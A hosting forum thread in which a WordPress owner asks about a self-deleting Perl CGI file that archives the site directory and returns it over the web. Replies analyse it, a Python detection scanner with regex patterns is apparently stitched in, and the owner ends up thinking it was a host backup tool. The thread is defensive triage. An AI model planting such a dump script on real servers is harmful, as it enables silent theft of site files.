
Weird file appeared in hosting. Anyone know what it is?

Hi,

Hoping that some of you can confirm if this is a normal file or anything malicious? I don't want to take any chances. The website is WordPress based.

In public_html a file appeared just over a week ago.

Name: ftpd0pFi5.cgi

Code inside:

```perl
#!/usr/bin/perl
use strict;
use warnings;

print "Content-Type: text/html\n\n";

unlink $0;
my $root = $ENV{DOCUMENT_ROOT_REAL};

chdir $root;
exec 'tar', 'c', '../.';
```


Thanks.
 
Don't know what that is.

tar is a file archive utility ...so has a backup plugin been installed recently or failed??
 
I'd say that was malicious, the `exec 'tar', 'c', '../.'` is effectively "drop down a directory, zip everything up and send that as the response to the web request".

The `unlink $0` will remove the file (ftpd0pFi5.cgi) as soon as it has been run.
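
A read-only triage check for the traits described in the reply above (self-deletion, an archiver launched with exec, a parent-directory target, output sent as an HTTP response), as an added example that is not part of the original thread. The regexes, the 14-day window and the names `triage_script` and `scan_docroot` are this example's own assumptions; a hit means the file deserves a closer look, not that it is malicious.

```python
import re
import tempfile
import time
from pathlib import Path

# Heuristics for the traits discussed in the thread (this example's own regexes).
TRAITS = {
    "self_delete": re.compile(r"\bunlink\s*\(?\s*(\$0|__FILE__)"),
    "runs_archiver": re.compile(r"\b(exec|system)\b[^;]*['\"](tar|zip)['\"]"),
    "parent_dir_target": re.compile(r"['\"]\.\./"),
    "http_response": re.compile(r"Content-Type:", re.I),
}
SCRIPT_SUFFIXES = {".cgi", ".pl"}

def triage_script(text):
    """Return the sorted names of the traits found in one script's source."""
    return sorted(name for name, rx in TRAITS.items() if rx.search(text))

def scan_docroot(root, max_age_days=14, min_traits=2):
    """Return (path, traits) for recently modified CGI/Perl files matching at
    least min_traits heuristics. Nothing is executed or deleted."""
    cutoff = time.time() - max_age_days * 86400
    hits = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCRIPT_SUFFIXES:
            continue
        if path.stat().st_mtime < cutoff:  # mtime stands in for "appeared recently"
            continue
        traits = triage_script(path.read_text(errors="replace"))
        if len(traits) >= min_traits:
            hits.append((str(path), traits))
    return hits

# The script quoted in the thread (blank lines dropped), used as sample input.
THREAD_SAMPLE = r"""#!/usr/bin/perl
use strict;
use warnings;
print "Content-Type: text/html\n\n";
unlink $0;
my $root = $ENV{DOCUMENT_ROOT_REAL};
chdir $root;
exec 'tar', 'c', '../.';
"""

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as docroot:
        Path(docroot, "ftpd0pFi5.cgi").write_text(THREAD_SAMPLE)
        print(scan_docroot(docroot))
```

Pointing `scan_docroot` at a copy of `public_html` lists candidates to compare against the web server's access log and the host's backup tooling.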
 
Thanks for the help,

Regarding what you said, TallBloke, and the description of what is being run from Dave, this sounds like it could be my host's full site backup utility. I do actually remember it failing around the time as I was trying to get a backup to my desktop.

I will keep the file deleted.

Thanks,

Mat
 
